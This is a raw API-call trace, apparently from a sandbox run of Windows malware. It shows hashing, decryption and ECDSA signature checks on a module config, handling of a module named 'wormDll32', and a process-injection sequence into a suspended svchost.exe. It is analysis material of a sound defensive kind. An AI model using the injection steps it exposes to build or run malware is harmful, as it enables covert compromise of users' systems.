	[0239.810] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.810] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2380
	[0239.810] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2380, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2380, pdwDataLen=0x128ba4) returned 1
	[0239.810] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.810] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.810] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.810] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.810] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0239.811] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c23a8
	[0239.811] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c23a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c23a8, pdwDataLen=0x128ba4) returned 1
	[0239.811] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.811] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.811] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.811] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.811] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0239.811] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.811] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c23d0
	[0239.811] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c23d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c23d0, pdwDataLen=0x128ba4) returned 1
	[0239.811] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.811] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.811] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.812] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.812] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0239.812] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c23f8
	[0239.812] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c23f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c23f8, pdwDataLen=0x128ba4) returned 1
	[0239.812] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.812] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.812] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.812] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.812] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0239.812] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.812] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2420
	[0239.812] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2420, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2420, pdwDataLen=0x128ba4) returned 1
	[0239.812] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.812] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.812] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.813] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.813] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0239.813] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.813] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2448
	[0239.813] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2448, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2448, pdwDataLen=0x128ba4) returned 1
	[0239.813] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.813] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.813] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.814] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.814] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0239.814] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2470
	[0239.814] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2470, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2470, pdwDataLen=0x128ba4) returned 1
	[0239.814] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.814] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.814] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.814] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.814] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0239.814] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.814] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2498
	[0239.814] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2498, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2498, pdwDataLen=0x128ba4) returned 1
	[0239.814] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.814] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.814] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.815] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.815] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0239.815] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c24c0
	[0239.815] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c24c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c24c0, pdwDataLen=0x128ba4) returned 1
	[0239.815] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.815] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.815] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.815] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.815] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0239.815] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.815] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c24e8
	[0239.816] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c24e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c24e8, pdwDataLen=0x128ba4) returned 1
	[0239.816] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.816] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.816] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.816] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.816] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0239.816] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.816] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2510
	[0239.816] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2510, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2510, pdwDataLen=0x128ba4) returned 1
	[0239.816] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.816] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.816] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.817] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.817] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0239.817] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.817] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2538, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2538, pdwDataLen=0x128ba4) returned 1
	[0239.817] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.817] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.817] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.817] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.817] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0239.818] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.818] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c2560, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2560, pdwDataLen=0x128ba4) returned 1
	[0239.818] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.818] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.818] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.818] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.818] CryptHashData (hHash=0x22b6f40, pbData=0x2892008, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0239.818] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.818] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c2588, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c2588, pdwDataLen=0x128ba4) returned 1
	[0239.818] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0239.818] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.818] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0239.819] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0239.819] CryptHashData (hHash=0x22b6940, pbData=0x2892008, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0239.819] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0239.819] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27c25b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27c25b0, pdwDataLen=0x128ba4) returned 1
	[0239.819] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0239.819] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0239.864] CryptImportKey (in: hProv=0x2255b0, pbData=0x128b98, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128bd8 | out: phKey=0x128bd8*=0x22b6940) returned 1
	[0239.864] CryptSetKeyParam (hKey=0x22b6940, dwParam=0x4, pbData=0x128bc4*=0x1, dwFlags=0x0) returned 1
	[0239.864] CryptSetKeyParam (hKey=0x22b6940, dwParam=0x1, pbData=0x27c2740, dwFlags=0x0) returned 1
	[0239.864] CryptDecrypt (in: hKey=0x22b6940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2878dc0, pdwDataLen=0x128bcc | out: pbData=0x2878dc0, pdwDataLen=0x128bcc) returned 1
	[0239.865] CryptDestroyKey (hKey=0x22b6940) returned 1
	[0239.865] CryptReleaseContext (hProv=0x2255b0, dwFlags=0x0) returned 1
	[0239.865] GetVersion () returned 0x1db10106
	[0239.866] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128bd8, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128bd8) returned 0x0
	[0239.867] BCryptImportKeyPair (in: hAlgorithm=0x22ee348, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128be0, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128be0) returned 0x0
	[0239.870] BCryptGetProperty (in: hObject=0x229a570, pszProperty="SignatureLength", pbOutput=0x128bf8, cbOutput=0x4, pcbResult=0x128bd0, dwFlags=0x0 | out: pbOutput=0x128bf8, pcbResult=0x128bd0) returned 0x0
	[0239.870] BCryptVerifySignature (hKey=0x229a570, pPaddingInfo=0x0, pbHash=0x22a66c0, cbHash=0x30, pbSignature=0x2885c37, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0239.872] BCryptDestroyKey (in: hKey=0x229a570 | out: hKey=0x229a570) returned 0x0
	[0239.872] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee348, dwFlags=0x0 | out: hAlgorithm=0x22ee348) returned 0x0
	[0239.872] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a66c0) returned 1
	[0239.873] lstrlenA (lpString="<moduleconfig>*</moduleconfig>") returned 30
	[0239.873] CharLowerBuffA (in: lpsz="moduleconfig", cchLength=0xc | out: lpsz="moduleconfig") returned 0xc
	[0239.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e17e0) returned 1
	[0239.873] CharLowerBuffA (in: lpsz="autostart", cchLength=0x9 | out: lpsz="autostart") returned 0x9
	[0239.873] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e17e0) returned 1
	[0239.873] CharLowerBuffA (in: lpsz="sys", cchLength=0x3 | out: lpsz="sys") returned 0x3
	[0239.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e16a8) returned 1
	[0239.874] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0239.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e16c0) returned 1
	[0239.874] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0239.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e16c0) returned 1
	[0239.874] CharLowerBuffA (in: lpsz="needinfo", cchLength=0x8 | out: lpsz="needinfo") returned 0x8
	[0239.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1690) returned 1
	[0239.874] CharLowerBuffA (in: lpsz="name", cchLength=0x4 | out: lpsz="name") returned 0x4
	[0239.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1690) returned 1
	[0239.874] CharLowerBuffA (in: lpsz="id", cchLength=0x2 | out: lpsz="id") returned 0x2
	[0239.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e16d8) returned 1
	[0239.874] CharLowerBuffA (in: lpsz="ip", cchLength=0x2 | out: lpsz="ip") returned 0x2
	[0239.874] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e16d8) returned 1
	[0239.877] WriteFile (in: hFile=0x6bc, lpBuffer=0x286be98*, nNumberOfBytesToWrite=0xcf20, lpNumberOfBytesWritten=0x128c38, lpOverlapped=0x0 | out: lpBuffer=0x286be98*, lpNumberOfBytesWritten=0x128c38*=0xcf20, lpOverlapped=0x0) returned 1
	[0239.880] CloseHandle (hObject=0x6bc) returned 1
	[0239.880] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x286be98) returned 1
	[0239.880] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x234f30) returned 1
	[0239.880] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6618) returned 1
	[0239.880] WinHttpCloseHandle (hInternet=0x27f0c10) returned 1
	[0239.880] WinHttpCloseHandle (hInternet=0x22c6720) returned 1
	[0239.880] WinHttpCloseHandle (hInternet=0x22c6638) returned 1
	[0239.880] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0148) returned 1
	[0239.880] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27784b0, Size=0x20) returned 0x27c0148
	[0239.881] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0058) returned 1
	[0239.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wormDll32", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10
	[0239.881] lstrcmpiW (lpString1="control", lpString2="start") returned -1
	[0239.881] lstrcmpiW (lpString1="control", lpString2="release") returned -1
	[0239.881] CloseHandle (hObject=0x0) returned 0
	[0239.881] CloseHandle (hObject=0x0) returned 0
	[0239.881] CloseHandle (hObject=0x0) returned 0
	[0239.881] GetStartupInfoW (in: lpStartupInfo=0x128750 | out: lpStartupInfo=0x128750*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x22c6638, hStdOutput=0x1f7800, hStdError=0x1d0150)) 
	[0239.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0058
	[0239.881] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x128750*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x22c6638, hStdOutput=0x1f7800, hStdError=0x1d0150), lpProcessInformation=0x128794 | out: lpCommandLine="svchost.exe", lpProcessInformation=0x128794*(hProcess=0x6bc, hThread=0x6d4, dwProcessId=0x748, dwThreadId=0xe20)) returned 1
	[0239.885] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0058) returned 1
	[0239.885] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x680
	[0239.885] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6c8
	[0239.885] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x5a4
	[0239.885] GetCurrentProcess () returned 0xffffffff
	[0239.885] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x680, hTargetProcessHandle=0x6bc, lpTargetHandle=0x128720, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128720*=0x4) returned 1
	[0239.885] GetCurrentProcess () returned 0xffffffff
	[0239.885] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x6c8, hTargetProcessHandle=0x6bc, lpTargetHandle=0x128724, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128724*=0x8) returned 1
	[0239.885] GetCurrentProcess () returned 0xffffffff
	[0239.885] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5a4, hTargetProcessHandle=0x6bc, lpTargetHandle=0x128728, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128728*=0xc) returned 1
	[0239.885] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x16f, flAllocationType=0x3000, flProtect=0x40) returned 0x50000
	[0239.885] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x50000, lpBuffer=0xd712d0*, nSize=0x16f, lpNumberOfBytesWritten=0x1285cc | out: lpBuffer=0xd712d0*, lpNumberOfBytesWritten=0x1285cc*=0x16f) returned 1
	[0239.886] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0239.886] GetProcAddress (hModule=0x76b10000, lpProcName="SignalObjectAndWait") returned 0x76b761d9
	[0239.887] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0239.887] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0239.887] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0239.887] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0239.887] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0239.887] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0239.888] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0239.888] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x40) returned 0x60000
	[0239.888] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x60000, lpBuffer=0x128720*, nSize=0x70, lpNumberOfBytesWritten=0x1285cc | out: lpBuffer=0x128720*, lpNumberOfBytesWritten=0x1285cc*=0x70) returned 1
	[0239.888] NtQueryInformationProcess (in: ProcessHandle=0x6bc, ProcessInformationClass=0x0, ProcessInformation=0x1285b4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1285b4, ReturnLength=0x0) returned 0x0
	[0239.888] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x7ffd3000, lpBuffer=0x1285cc, nSize=0x10, lpNumberOfBytesRead=0x128458 | out: lpBuffer=0x1285cc*, lpNumberOfBytesRead=0x128458*=0x10) returned 1
	[0239.889] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x600000, lpBuffer=0x128574, nSize=0x40, lpNumberOfBytesRead=0x128458 | out: lpBuffer=0x128574*, lpNumberOfBytesRead=0x128458*=0x40) returned 1
	[0239.889] ReadProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x6000d8, lpBuffer=0x12847c, nSize=0xf8, lpNumberOfBytesRead=0x128458 | out: lpBuffer=0x12847c*, lpNumberOfBytesRead=0x128458*=0xf8) returned 1
	[0239.889] WriteProcessMemory (in: hProcess=0x6bc, lpBaseAddress=0x602104, lpBuffer=0x128790*, nSize=0xc, lpNumberOfBytesWritten=0x1285cc | out: lpBuffer=0x128790*, lpNumberOfBytesWritten=0x1285cc*=0xc) returned 1
	[0239.890] ResetEvent (hEvent=0x6c8) returned 1
	[0239.890] ResetEvent (hEvent=0x680) returned 1
	[0239.890] ResumeThread (hThread=0x6d4) returned 0x1
	[0239.890] SignalObjectAndWait (hObjectToSignal=0x6c8, hObjectToWaitOn=0x680, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0239.908] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd40000, dwSize=0x13000, flAllocationType=0x2000, flProtect=0x40) returned 0x6cd40000
	[0239.909] VirtualAllocEx (hProcess=0x6bc, lpAddress=0x6cd40000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd40000
